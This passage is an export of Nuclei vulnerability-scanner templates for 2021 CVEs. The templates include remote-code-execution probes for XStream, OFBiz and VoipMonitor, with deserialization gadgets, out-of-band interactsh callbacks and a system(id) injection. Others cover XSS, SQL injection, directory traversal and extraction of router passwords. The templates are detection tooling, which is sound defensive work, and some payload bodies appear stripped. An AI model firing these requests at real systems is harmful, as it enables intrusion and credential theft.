    \"\n# digest: 4b0a00483046022100f125f16d207fd3e53d356fe5c41c9fc12d9d715224fdfcef6af1a426dfe83f56022100e3216df501445badb52c586e7310fb9f642bcb812d9a98de6f3af7b9bd8f2875:922c64590222798bb761d5b6d8e72950", "hash": "e9aa336d4162f1dfba9efc4b01a872f3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308339" }, "name": "CVE-2021-29505.yaml", "content": "id: CVE-2021-29505\n\ninfo:\n name: XStream <1.4.17 - Remote Code Execution\n author: pwnhxl\n severity: high\n description: |\n XStream before 1.4.17 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: Patched in 1.4.17.\n reference:\n - https://paper.seebug.org/1543/\n - https://github.com/vulhub/vulhub/blob/master/xstream/CVE-2021-29505/README.zh-cn.md\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29505\n - https://github.com/x-stream/xstream/security/advisories/GHSA-7chv-rrw6-w6fc\n - https://nvd.nist.gov/vuln/detail/cve-2021-29505\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-29505\n cwe-id: CWE-502\n epss-score: 0.04677\n epss-percentile: 0.91814\n cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xstream_project\n product: xstream\n tags: cve2021,cve,oast,vulhub,xstream,deserialization,rce,xstream_project\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n \n \n \n \n 2\n \n 3\n \n 12345\n \n com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content\n \n \n \n 12345\n \n \n true\n SOAP_11\n \n \n false\n \n \n \n \n aa\n 
aa\n \n \n \n \n \n UnicastRef\n {{interactsh-url}}\n 1099\n 0\n 0\n 0\n 0\n false\n \n \n {{interactsh-url}}\n 1099\n \n \n \n \n \n \n \n \n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: word\n part: body\n words:\n - \"timestamp\"\n - \"com.thoughtworks.xstream\"\n condition: or\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 500\n# digest: 4b0a00483046022100dbbd8f5e47047dc1ce75b7aa5cebea7678b2035517dd765160b1b31106393cd7022100b3ecc5d68e800b780f78acdae9aa0f9f80b4d2b8778cc7a32e7fce49e0ff5c60:922c64590222798bb761d5b6d8e72950", "hash": "7ce3482f5fa2bddd36f812199a62b610", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30833a" }, "name": "CVE-2021-29622.yaml", "content": "id: CVE-2021-29622\n\ninfo:\n name: Prometheus - Open Redirect\n author: geeknik\n severity: medium\n description: Prometheus 2.23.0 through 2.26.0 and 2.27.0 contains an open redirect vulnerability. To ensure a seamless transition to 2.27.0, the default UI was changed to the new UI with a URL prefixed by /new redirect to /. Due to a bug in the code, an attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the disclosure of sensitive information.\n remediation: The issue was patched in the 2.26.1 and 2.27.1 releases. In 2.28.0, the /new endpoint will be removed completely. 
The workaround is to disable access to /new via a reverse proxy in front of Prometheus.\n reference:\n - https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7\n - https://github.com/prometheus/prometheus/releases/tag/v2.26.1\n - https://github.com/prometheus/prometheus/releases/tag/v2.27.1\n - https://nvd.nist.gov/vuln/detail/CVE-2021-29622\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-29622\n cwe-id: CWE-601\n epss-score: 0.00269\n epss-percentile: 0.64358\n cpe: cpe:2.3:a:prometheus:prometheus:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: prometheus\n product: prometheus\n tags: cve2021,cve,prometheus,redirect\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/new/newhttp://interact.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4b0a00483046022100835e27d67c02978fd0bee911d344ea0062c9e27f3aa7ebaa04152f8a13c5fb1502210086d26f492cb3cba2db01d24993db842112f1f8c56d94e7472d45703b2f8be045:922c64590222798bb761d5b6d8e72950", "hash": "e3022dc14861e543360181f0721c3650", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30833b" }, "name": "CVE-2021-29625.yaml", "content": "id: CVE-2021-29625\n\ninfo:\n name: Adminer <=4.8.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Adminer 4.6.1 to 4.8.0 contains a cross-site scripting vulnerability which affects users of MySQL, MariaDB, PgSQL, and SQLite in browsers without CSP when Adminer uses a `pdo_` extension to communicate with the database (it is used if the native extensions are not enabled).\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the Adminer interface, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: This vulnerability 
is patched in version 4.8.1. As workarounds, one can use a browser supporting strict CSP or enable the native PHP extensions (e.g. `mysqli`) or disable displaying PHP errors (`display_errors`).\n reference:\n - https://sourceforge.net/p/adminer/bugs-and-features/797/\n - https://github.com/vrana/adminer/commit/4043092ec2c0de2258d60a99d0c5958637d051a7\n - https://nvd.nist.gov/vuln/detail/CVE-2021-29625\n - https://github.com/vrana/adminer/security/advisories/GHSA-2v82-5746-vwqc\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-29625\n cwe-id: CWE-79\n epss-score: 0.00222\n epss-percentile: 0.60557\n cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: adminer\n product: adminer\n tags: cve2021,cve,adminer,xss,sqli\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502203bbedb78e2e0bddd6d7b3eefa0c1fca62d18deb2759881cb15089fbac64253a0022100cc7857e4cfd08807f6efcec5c623f04693979c11de46feee3edb0b5ec2ba53db:922c64590222798bb761d5b6d8e72950", "hash": "8f7044e2829412b326512ec26000b22f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30833c" }, "name": "CVE-2021-3002.yaml", "content": "id: CVE-2021-3002\n\ninfo:\n name: Seo Panel 4.8.0 - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: Seo Panel 4.8.0 contains a reflected cross-site scripting vulnerability via the seo/seopanel/login.php?sec=forgot email parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, 
leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to a patched version of Seo Panel or apply the necessary security patches provided by the vendor.\n reference:\n - http://www.cinquino.eu/SeoPanelReflect.htm\n - https://github.com/seopanel/Seo-Panel/issues/202\n - https://nvd.nist.gov/vuln/detail/CVE-2021-3002\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ArrestX/--POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-3002\n cwe-id: CWE-79\n epss-score: 0.00143\n epss-percentile: 0.49273\n cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: \"seopanel\"\n product: seo_panel\n tags: cve2021,cve,seopanel,xss\n\nhttp:\n - raw:\n - |\n POST /seo/seopanel/login.php?sec=forgot HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n sec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n part: body\n words:\n - \"\"\n - \"seopanel\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502207e4f1ee2781a368be0c458eaaae8adb53e43b78fb18efe6e0ddbd4360db50c72022100bf77a98625b43e44488d9ed1d3bc33636a35c06b8c93ced20fe941ed6cf52a97:922c64590222798bb761d5b6d8e72950", "hash": "a91676f1e21fb7ca3add00d5767e5ee2", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30833d" }, "name": "CVE-2021-30049.yaml", "content": "id: CVE-2021-30049\n\ninfo:\n name: SysAid Technologies 20.3.64 b14 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: SysAid 20.3.64 b14 contains a cross-site scripting vulnerability via the /KeepAlive.jsp?stamp= URI.\n impact: |\n Successful exploitation of this vulnerability could allow 
an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the vendor's patch or upgrade SysAid to a release later than 20.3.64 b14 to mitigate the XSS vulnerability.\n reference:\n - https://eh337.net/2021/03/30/sysaid/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-30049\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-30049\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42156\n cpe: cpe:2.3:a:sysaid:sysaid:20.3.64:b14:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sysaid\n product: sysaid\n tags: cve2021,cve,xss,sysaid\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"<script>alert(document.domain)</script>\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022028b94d02cab2dca2d269c060aa0ff187310ad35a3917e3e696e358740268283f022100c91d9c5464fb7277fab1b843d65f55ca0dd5bc4b90d3e89464eb55cd8062d9b1:922c64590222798bb761d5b6d8e72950", "hash": "7ea039a90540570d37381d9faae05be8", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30833e" }, "name": "CVE-2021-30128.yaml", "content": "id: CVE-2021-30128\n\ninfo:\n name: Apache OFBiz <17.12.07 - Arbitrary Code Execution\n author: For3stCo1d\n severity: critical\n description: Apache OFBiz before 17.12.07 is susceptible to arbitrary code execution via unsafe deserialization. 
An attacker can modify deserialized data or code without using provided accessor functions.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade Apache OFBiz to version 17.12.07 or later to mitigate this vulnerability.\n reference:\n - https://lists.apache.org/thread.html/rbe8439b26a71fc3b429aa793c65dcc4a6e349bc7bb5010746a74fa1d@%3Ccommits.ofbiz.apache.org%3E\n - https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743%40%3Cdev.ofbiz.apache.org%3E\n - https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743@%3Cdev.ofbiz.apache.org%3E\n - https://nvd.nist.gov/vuln/detail/CVE-2021-30128\n - http://www.openwall.com/lists/oss-security/2021/04/27/5\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-30128\n cwe-id: CWE-502\n epss-score: 0.62199\n epss-percentile: 0.97748\n cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: apache\n product: ofbiz\n fofa-query: app=\"Apache_OFBiz\"\n tags: cve2021,cve,apache,ofbiz,deserialization,rce\n\nhttp:\n - raw:\n - |\n POST /webtools/control/SOAPService HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/xml\n\n \n \n \n \n \n \n \n {{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"hex\")}}\n \n \n \n \n \n \n \n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: word\n part: body\n words:\n - 'value=\"errorMessage\"'\n# digest: 490a004630440220198d21301bb0cc9c3eca7b3090244d4d6af10af1c8535d48b44443bc399a45a60220120ccdf8a168a43e6464f01e26d331f958ed562b71f2f1a0038dc57f6336595f:922c64590222798bb761d5b6d8e72950", "hash": "be592a82a89d8e5b47e3a39603e2f45a", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30833f" }, "name": 
"CVE-2021-30134.yaml", "content": "id: CVE-2021-30134\n\ninfo:\n name: Php-mod/curl Library <2.3.2 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n Php-mod/curl library before 2.3.2 contains a cross-site scripting vulnerability via the post_file_path_upload.php key parameter and the POST data to post_multidimensional.php. An attacker can inject arbitrary script, which can allow theft of cookie-based authentication credentials and launch of other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Upgrade to Php-mod/curl Library version 2.3.2 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/0b547728-27d2-402e-ae17-90d539344ec7\n - https://nvd.nist.gov/vuln/detail/CVE-2021-30134\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-30134\n cwe-id: CWE-79\n epss-score: 0.00097\n epss-percentile: 0.40139\n cpe: cpe:2.3:a:php_curl_class_project:php_curl_class:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: php_curl_class_project\n product: php_curl_class\n google-query: inurl:\"/php-curl-test/post_file_path_upload.php\"\n tags: cve2021,cve,xss,php-mod,wpscan,php_curl_class_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php?key=\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'key\":\"\"'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022054a7b10e32bdea6ad4464c85b29694b0a5fefd2b52c45ea6881458499ce110f6022074ab27b57a2dff0fa2011fb0edc23bda373e4d309c0498cf1470984592c44738:922c64590222798bb761d5b6d8e72950", "hash": "4f70e494bef68f66f327d8cc99a3d9b6", "level": 4, 
"time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308340" }, "name": "CVE-2021-30151.yaml", "content": "id: CVE-2021-30151\n\ninfo:\n name: Sidekiq <=6.2.0 - Cross-Site Scripting\n author: DhiyaneshDk\n severity: medium\n description: |\n Sidekiq through 5.1.3 and 6.x through 6.2.0 contains a cross-site scripting vulnerability via the queue name of the live-poll feature when Internet Explorer is used.\n Note: the first request of this template logs in through an application-specific JSON endpoint (POST /api/auth with email/password); this is not part of Sidekiq's own web UI and may need to be adapted to the target application's authentication before the check is meaningful.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, data theft, or session hijacking.\n remediation: |\n Upgrade to a Sidekiq release newer than 6.2.0 (6.2.1 or later) to mitigate this vulnerability; 6.2.0 itself is still affected.\n reference:\n - https://github.com/mperham/sidekiq/issues/4852\n - https://lists.debian.org/debian-lts-announce/2022/03/msg00015.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-30151\n - https://lists.debian.org/debian-lts-announce/2023/03/msg00011.html\n - https://github.com/Elsfa7-110/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-30151\n cwe-id: CWE-79\n epss-score: 0.00574\n epss-percentile: 0.77475\n cpe: cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: contribsys\n product: sidekiq\n shodan-query: title:\"Sidekiq\"\n tags: cve2021,cve,xss,sidekiq,authenticated,contribsys\n\nhttp:\n - raw:\n - |\n POST /api/auth HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\"email\":\"{{username}}\",\"password\":\"{{password}}\"}\n - |\n GET /queues/\"onmouseover=\"alert(document.domain)\" HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'onmouseover=\"alert(document.domain)'\n - 'sidekiq'\n condition: and\n case-insensitive: true\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 
490a004630440220130538944f3f1871ac5aeb68f5998d755e83750ee3dac79cd8b56281de5701bd022001daf8dcf6c2450756a9327e75db2241d0fa9df706b70d735eeb121711653abc:922c64590222798bb761d5b6d8e72950", "hash": "d427987973d57218d968e050e4746a8e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308341" }, "name": "CVE-2021-3017.yaml", "content": "id: CVE-2021-3017\n\ninfo:\n name: Intelbras WIN 300/WRN 342 - Credentials Disclosure\n author: pikpikcu\n severity: high\n description: Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code.\n impact: |\n An attacker can gain unauthorized access to the router's administrative interface and potentially compromise the entire network.\n remediation: |\n Update the router firmware to the latest version, which includes a fix for the vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-3017\n - https://pastebin.com/cTYTf0Yn\n - https://github.com/bigblackhat/oFx\n - https://github.com/openx-org/BLEN\n - https://github.com/Miraitowa70/POC-Notes\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-3017\n epss-score: 0.01527\n epss-percentile: 0.86768\n cpe: cpe:2.3:o:intelbras:win_300_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: intelbras\n product: win_300_firmware\n tags: cve2021,cve,exposure,router,intelbras\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.asp\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'def_wirelesspassword ='\n - 'Roteador Wireless'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n regex:\n - 'def_wirelesspassword = \"([A-Za-z0-9=]+)\";'\n part: body\n# digest: 
490a00463044022046f96617b2d3f46fb61daf58af99864f5885417b5db82f144672de11b88aee0b02204fc94b7179768b51a7e4285534b628216666e5a2f21f503770ec483aa16e7c3a:922c64590222798bb761d5b6d8e72950", "hash": "70e9ff11d6945570ec9a5ef75054f7c7", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308342" }, "name": "CVE-2021-30175.yaml", "content": "id: CVE-2021-30175\n\ninfo:\n name: ZEROF Web Server 1.0 - SQL Injection\n author: edoardottt\n severity: critical\n description: |\n ZEROF Web Server 1.0 (April 2021) allows SQL Injection via the /HandleEvent endpoint for the login page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in ZEROF Web Server 1.0.\n reference:\n - https://github.com/awillix/research/blob/main/cve/CVE-2021-30175.md\n - https://nvd.nist.gov/vuln/detail/CVE-2021-30175\n - https://pro.zerof.ru\n - https://github.com/awillix/research\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-30175\n cwe-id: CWE-89\n epss-score: 0.05126\n epss-percentile: 0.92775\n cpe: cpe:2.3:a:zerof:web_server:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zerof\n product: web_server\n tags: cve2021,cve,zerof,sqli\n\nhttp:\n - raw:\n - |\n POST /HandleEvent HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n Ajax=1&IsEvent=1&Obj=O4F&Evt=click&this=O4F&\"_fp_=_S_ID=CteTYLjmYw108029DC1&O33=%020%02%02'&O37=%020%02%02fff\"&_seq_=2&_uo_=O\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"You have an error in your SQL syntax\"\n\n - type: word\n part: header\n words:\n - \"ZEROF\"\n\n - type: status\n status:\n - 200\n# digest: 
490a00463044022066b28106254e20b51249bccd4a6755378cf7bd895b20f4a7cd38193a27913081022024e2161db17ae6f5c03b0ef08c86ddc750b8b80e096c106097c2b90aa5d07b83:922c64590222798bb761d5b6d8e72950", "hash": "351dde6466e23a9db35312a9b1b7080b", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308343" }, "name": "CVE-2021-3019.yaml", "content": "id: CVE-2021-3019\n\ninfo:\n name: ffay lanproxy Directory Traversal\n author: pikpikcu\n severity: high\n description: ffay lanproxy 0.1 is susceptible to a directory traversal vulnerability that could let attackers read /../conf/config.properties to obtain credentials for a connection to the intranet. The probe sends a literal /../ path segment, which has to reach the server un-normalized for the check to work.\n impact: |\n An unauthenticated attacker can read files outside the web root, in particular conf/config.properties, which discloses the config.admin.username and config.admin.password values and with them access to the proxied intranet. The CVSS vector scores confidentiality impact only (C:H/I:N/A:N); remote code execution is not implied by this issue.\n remediation: |\n Apply the latest patch or upgrade to a version that has fixed the vulnerability.\n reference:\n - https://github.com/ffay/lanproxy/commits/master\n - https://github.com/maybe-why-not/lanproxy/issues/1\n - https://nvd.nist.gov/vuln/detail/CVE-2021-3019\n - https://github.com/manas3c/CVE-POC\n - https://github.com/sobinge/nuclei-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-3019\n cwe-id: CWE-22\n epss-score: 0.00832\n epss-percentile: 0.81646\n cpe: cpe:2.3:a:lanproxy_project:lanproxy:0.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: lanproxy_project\n product: lanproxy\n tags: cve2021,cve,lanproxy,lfi,lanproxy_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/../conf/config.properties\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/octet-stream\"\n condition: and\n\n - type: word\n part: body\n words:\n - \"config.admin.username\"\n - \"config.admin.password\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 
4b0a00483046022100823507dd00b2974bdd4f0260d6614312eb2103421df54d284e01eb0a9b14620d0221008f77848c7872a70284b767b35da931c4650b4726930dcd0501409cb1332098f1:922c64590222798bb761d5b6d8e72950", "hash": "1a00b404df6f064aa759e94053e0341f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308344" }, "name": "CVE-2021-30213.yaml", "content": "id: CVE-2021-30213\n\ninfo:\n name: Knowage Suite 7.3 - Cross-Site Scripting\n author: alph4byt3\n severity: medium\n description: Knowage Suite 7.3 contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can inject arbitrary web script in '/servlet/AdapterHTTP' via the 'targetService' parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in Knowage Suite 7.3.\n reference:\n - https://github.com/piuppi/Proof-of-Concepts/blob/main/Engineering/XSS-KnowageSuite7-3_unauth.md\n - https://nvd.nist.gov/vuln/detail/CVE-2021-30213\n - https://github.com/piuppi/Proof-of-Concepts\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-30213\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42145\n cpe: cpe:2.3:a:eng:knowage:7.3.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: eng\n product: knowage\n tags: cve2021,cve,xss,knowage,eng\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n 
matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100cfbbf3db9a769e00375b35c64dca16ef254e615b0d407880713bb95445b66706022100bf105f676804f221b9236fe9820577fc487333145d8debcdecbafbc7b620a01f:922c64590222798bb761d5b6d8e72950", "hash": "87972b0ada6b6fb85a3c01a56a25c0fa", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308345" }, "name": "CVE-2021-30461.yaml", "content": "id: CVE-2021-30461\n\ninfo:\n name: VoipMonitor <24.61 - Remote Code Execution\n author: shifacyclewala,hackergautam\n severity: critical\n description: |\n VoipMonitor prior to 24.61 is susceptible to remote code execution vulnerabilities because of its use of user supplied data via its web interface, allowing remote unauthenticated users to trigger a remote PHP code execution vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade VoipMonitor to version 24.61 or later to mitigate this vulnerability.\n reference:\n - https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-30461\n - https://ssd-disclosure.com/ssd-advisory--voipmonitor-unauth-rce\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-30461\n cwe-id: CWE-94\n epss-score: 0.96262\n epss-percentile: 0.99416\n cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: voipmonitor\n product: voipmonitor\n shodan-query: http.title:\"VoIPmonitor\"\n tags: cve2021,cve,rce,voipmonitor\n\nhttp:\n - raw:\n - |\n POST /index.php HTTP/1.1\n Host: {{Hostname}}\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Content-Type: application/x-www-form-urlencoded\n\n 
SPOOLDIR=test\".system(id).\"&recheck=Recheck\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"uid=\"\n - \"gid=\"\n - \"groups=\"\n - \"VoIPmonitor installation\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205be3afa5e166bb60f492d734f2482484d4ad69393104a82b4a48b56682ec1826022100f14cf4f4f25a436f1c9a8df7e69804e2f6eb76231534db52d1a6c2c4b9e75d60:922c64590222798bb761d5b6d8e72950", "hash": "99ae200231e479e260e03caf3ab4a015", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308346" }, "name": "CVE-2021-30497.yaml", "content": "id: CVE-2021-30497\n\ninfo:\n name: Ivanti Avalanche 6.3.2 - Local File Inclusion\n author: gy741\n severity: high\n description: Ivanti Avalanche 6.3.2 is vulnerable to local file inclusion because it allows remote unauthenticated user to access files that reside outside the 'image' folder.\n impact: |\n A remote unauthenticated attacker can read arbitrary files from the Avalanche server's filesystem through the imageFilePath parameter (the probe reads C:/windows/win.ini). The CVSS vector scores confidentiality impact only (C:H/I:N/A:N), so code execution is not implied, although disclosed configuration or credential files may enable further compromise of the affected system.\n remediation: |\n Apply the latest security patches or updates provided by Ivanti to fix the LFI vulnerability in Avalanche 6.3.2.\n reference:\n - https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/\n - https://forums.ivanti.com/s/article/Security-Alert-CVE-2021-30497-Directory-Traversal-Vulnerability?language=en_US\n - https://help.ivanti.com/wl/help/en_us/aod/5.4/Avalanche/Console/Launching_the_Avalanche.htm\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30497\n - 